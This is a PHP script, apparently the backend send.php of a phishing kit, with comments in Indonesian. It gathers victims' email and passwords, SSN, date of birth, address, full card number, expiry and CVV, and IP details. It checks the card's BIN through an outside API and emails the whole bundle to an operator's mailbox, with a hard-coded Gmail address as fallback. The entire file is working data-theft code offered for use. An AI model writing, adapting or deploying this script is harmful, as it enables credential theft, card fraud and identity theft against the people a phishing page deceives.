<?php
// Load Composer's autoloader di luar fungsi
require_once 'vendor/autoload.php';

use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;

function processAndSendData($jsonData) {
    // --- LOAD CONFIGURATION FROM lesta_conf.json ---
    $configFilePath = 'lesta_conf.json';
    $config = [];
    
    if (file_exists($configFilePath)) {
        $jsonContent = file_get_contents($configFilePath);
        $config = json_decode($jsonContent, true);
        
        if ($config === null && json_last_error() !== JSON_ERROR_NONE) {
            return json_encode([
                'status' => 'error',
                'message' => 'Invalid JSON in configuration file'
            ]);
        }
    } else {
        return json_encode([
            'status' => 'error',
            'message' => 'Configuration file lesta_conf.json not found'
        ]);
    }
    
    // Check if email sending is enabled
    if (isset($config['send_email']) && $config['send_email'] === false) {
        return json_encode([
            'status' => 'info',
            'message' => 'Email sending is disabled in configuration'
        ]);
    }
    
    // --- FUNGSI UNTUK MENDAPATKAN NILAI DARI DATA JSON ---
    function get_val($data, $key) {
        return isset($data[$key]) && !empty($data[$key]) ? htmlspecialchars($data[$key]) : '-';
    }
    
    // --- FUNGSI BIN CHECK ---
    function getBinInfo($cardNumber) {
        // Hapus spasi dari nomor kartu
        $cleanNumber = str_replace(' ', '', $cardNumber);
        
        // Ambil 6 digit pertama dari nomor kartu
        $bin = substr($cleanNumber, 0, 6);
        
        if (strlen($bin) < 6) {
            return [
                'bin' => $bin,
                'scheme' => 'INVALID',
                'type' => 'INVALID',
                'issuer' => 'INVALID',
                'country' => 'INVALID',
                'cardTier' => 'INVALID',
                'luhn' => 'INVALID'
            ];
        }
        
        // API endpoint
        $url = "https://data.handyapi.com/bin/{$bin}";
        
        // Inisialisasi cURL
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        if ($httpCode == 200 && !empty($response)) {
            $data = json_decode($response, true);
            
            if (isset($data['Status']) && $data['Status'] == 'SUCCESS') {
                $binInfo = [
                    'bin' => $bin,
                    'scheme' => isset($data['Scheme']) ? $data['Scheme'] : 'UNKNOWN',
                    'type' => isset($data['Type']) ? $data['Type'] : 'UNKNOWN',
                    'issuer' => isset($data['Issuer']) ? $data['Issuer'] : 'UNKNOWN',
                    'country' => isset($data['Country']['Name']) ? $data['Country']['Name'] : 'UNKNOWN',
                    'cardTier' => isset($data['CardTier']) ? $data['CardTier'] : 'UNKNOWN',
                    'luhn' => isset($data['Luhn']) ? ($data['Luhn'] ? 'VALID' : 'INVALID') : 'UNKNOWN'
                ];
                
                return $binInfo;
            }
        }
        
        // Jika API gagal atau data tidak lengkap
        return [
            'bin' => $bin,
            'scheme' => 'UNKNOWN',
            'type' => 'UNKNOWN',
            'issuer' => 'UNKNOWN',
            'country' => 'UNKNOWN',
            'cardTier' => 'UNKNOWN',
            'luhn' => 'UNKNOWN'
        ];
    }
    
    // --- DECODE DATA JSON ---
    $data = json_decode($jsonData, true);
    
    // Jika json_decode gagal, coba decode URL encoded string
    if ($data === null && json_last_error() !== JSON_ERROR_NONE) {
        $decodedJson = urldecode($jsonData);
        $data = json_decode($decodedJson, true);
    }
    
    // Jika masih gagal, gunakan array kosong
    if ($data === null) {
        $data = [];
    }
    
    // --- MENGAMBIL DATA DARI JSON ---
    $email    = get_val($data, 'email');
    $pass1    = get_val($data, 'password');
    $pass2    = get_val($data, 'password_1');
    $fname    = get_val($data, 'fname');
    $lname    = get_val($data, 'lname');
    $dob      = get_val($data, 'dob');
    $phone    = get_val($data, 'phone');
    $addr1    = get_val($data, 'addr1');
    $addr2    = get_val($data, 'addr2');
    $country  = get_val($data, 'country');
    $state    = get_val($data, 'state');
    $zip      = get_val($data, 'zip');
    $ssn      = get_val($data, 'ssn');
    $ip       = get_val($data, 'ip');
    $region   = get_val($data, 'region');
    $city     = get_val($data, 'city');
    $isp      = get_val($data, 'isp');
    $ua       = get_val($data, 'userAgent');
    $cc_num   = get_val($data, 'cardNumber');
    $cc_exp   = get_val($data, 'expiry');
    $cc_cvv   = get_val($data, 'cvv');
    $cc_cid   = get_val($data, 'cid');
    
    // Hapus spasi dari nomor kartu untuk BIN check
    $cc_num_clean = str_replace(' ', '', $cc_num);
    
    // --- PROSES BIN CHECK ---
    $binInfo = null;
    $binSubject = '';
    $binDisplay = '-';

    if ($cc_num_clean != '-' && strlen($cc_num_clean) >= 6) {
        $binInfo = getBinInfo($cc_num_clean);
        
        // Format untuk subject - singkatkan issuer jika terlalu panjang
        $issuerShort = $binInfo['issuer'];
        if (strlen($issuerShort) > 20) {
            $issuerShort = substr($issuerShort, 0, 20) . '...';
        }
        
        $binSubject = "BIN: {$binInfo['scheme']} {$binInfo['type']} {$issuerShort}";
        
        // Format untuk display di body email
        $binDisplay = "
        <div style='background-color: #f8f9fa; padding: 10px; margin: 10px 0; border-left: 4px solid #3498db;'>
            <p><b>BIN Information ({$binInfo['bin']}):</b></p>
            <p><b>Scheme:</b> {$binInfo['scheme']}<br>
               <b>Type:</b> {$binInfo['type']}<br>
               <b>Issuer:</b> {$binInfo['issuer']}<br>
               <b>Country:</b> {$binInfo['country']}<br>
               <b>Card Tier:</b> {$binInfo['cardTier']}<br>
               <b>Luhn Check:</b> <span style='color: " . ($binInfo['luhn'] == 'VALID' ? 'green' : 'red') . "; font-weight: bold;'>{$binInfo['luhn']}</span></p>
        </div>
        ";
    }
    
    // --- BUAT TIMESTAMP [JAM:MENIT:DETIK] ---
    $timeStamp = date('H:i:s');
    
    // --- STRUKTUR TEMPLATE HTML ASLI ---
    $bodyContent = "
<div style='font-family: Arial, sans-serif; max-width: 600px; border: 1px solid #eee; padding: 20px;'>
    <h2 style='color: #2c3e50; border-bottom: 2px solid #3498db;'>Account Login</h2>
    <p><b>Email :</b> {$email}</p>
    <p><b>Password 1 :</b> {$pass1}</p>
    <p><b>Password 2 :</b> {$pass2}</p>

    <h2 style='color: #2c3e50; border-bottom: 2px solid #3498db; margin-top: 30px;'>Personal Details</h2>
    <p><b>First Name:</b> {$fname}<br>
       <b>Last Name:</b> {$lname}<br>
       <b>DOB:</b> {$dob}<br>
       <b>SSN:</b> {$ssn}<br>
       <b>Phone Number:</b> {$phone}<br>
       <b>Address 1:</b> {$addr1}<br>
       <b>Address 2:</b> {$addr2}<br>
       <b>Country:</b> {$country}<br>
       <b>State:</b> {$state}<br>
       <b>Zip Code:</b> {$zip}</p>

    <h2 style='color: #2c3e50; border-bottom: 2px solid #e74c3c; margin-top: 30px;'>Payment Details</h2>
    <p><b>Card Holders:</b> {$fname} {$lname}<br>
       <b>Card Number:</b> {$cc_num}<br>
       <b>Card Expired:</b> {$cc_exp}<br>
       <b>Card CVV:</b> {$cc_cvv}<br>
       <b>Card CID:</b> {$cc_cid}</p>
    
    {$binDisplay}

    <h2 style='color: #2c3e50; border-bottom: 2px solid #7f8c8d; margin-top: 30px;'>Visitor Details</h2>
    <p><b>IP:</b> {$ip}<br>
       <b>Region:</b> {$region}<br>
       <b>City:</b> {$city}<br>
       <b>ISP:</b> {$isp}<br>
       <b>User Agent:</b> <span style='font-size: 11px; color: #666;'>{$ua}</span></p>
    
    <div style='margin-top: 20px; padding: 10px; background-color: #f0f0f0; font-size: 10px; text-align: center;'>
        <p>Time: {$timeStamp}</p>
    </div>
</div>
    ";
    
    // --- PROSES KIRIM EMAIL ---
    $mail = new PHPMailer(true);
    
    try {
        // --- Konfigurasi Server DARI CONFIG FILE ---
        $mail->isSMTP();
        $mail->Host       = $config['smtp_host'];
        $mail->SMTPAuth   = true;
        $mail->Username   = $config['smtp_username'];
        $mail->Password   = $config['smtp_password'];
        $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
        $mail->Port       = $config['smtp_port'];
        
        // Tambahkan custom headers untuk mencegah threading
        $mail->addCustomHeader('X-Entity-Ref-ID', $timeStamp);
        $mail->MessageID = '<' . time() . '.' . uniqid() . '@logger.system>';
    
        // --- Pengirim & Penerima DARI CONFIG FILE ---
        // Set From Name menggunakan fname dan lname dari data
        $fromName = "{$fname} {$lname}";
        if ($fname == '-' && $lname == '-') {
            $fromName = 'Logger System';
        }
        
        $mail->setFrom($config['smtp_from_email'], $fromName);
        
        // Gunakan emailto dari config sebagai penerima
        $recipientEmail = isset($config['emailto']) && !empty($config['emailto']) 
            ? $config['emailto'] 
            : 'dewalegion01@gmail.com';
        
        $mail->addAddress($recipientEmail);
    
        // --- Konten Email ---
        $mail->isHTML(true);
        
        // Format subject dengan timestamp [HH:MM:SS] di depan
        $cardPrefix = $binInfo ? $binInfo['bin'] : (strlen($cc_num_clean) >= 6 ? substr($cc_num_clean, 0, 6) : 'UNKNOWN');
        
        if (!empty($binSubject)) {
            $subject = "Card - [{$cardPrefix}] {$binSubject} [{$timeStamp}] ";
        } else {
            $subject = "New Data Log - IP: {$ip} [{$timeStamp}] ";
        }
        
        $mail->Subject = $subject;
        $mail->Body    = $bodyContent;
        $mail->AltBody = strip_tags($bodyContent);
    
        $mail->send();
        
        // --- RESPONSE SUCCESS ---
        return json_encode([
            'status' => 'success',
            'message' => 'Pesan telah berhasil dikirim',
            'bin_info' => $binInfo ?: 'No BIN info available',
            'subject' => $subject,
            'time' => $timeStamp,
            'timestamp' => date('Y-m-d H:i:s')
        ]);
    
    } catch (Exception $e) {
        // --- RESPONSE ERROR ---
        return json_encode([
            'status' => 'error',
            'message' => 'Pesan gagal dikirim',
            'error' => $mail->ErrorInfo,
            'time' => $timeStamp
        ]);
    }
}

// Jika file ini diakses langsung (bukan di-include), jalankan proses biasa
if (basename($_SERVER['PHP_SELF']) == 'send.php') {
    $jsonData = isset($_GET['data']) ? $_GET['data'] : '{}';
    echo processAndSendData($jsonData);
}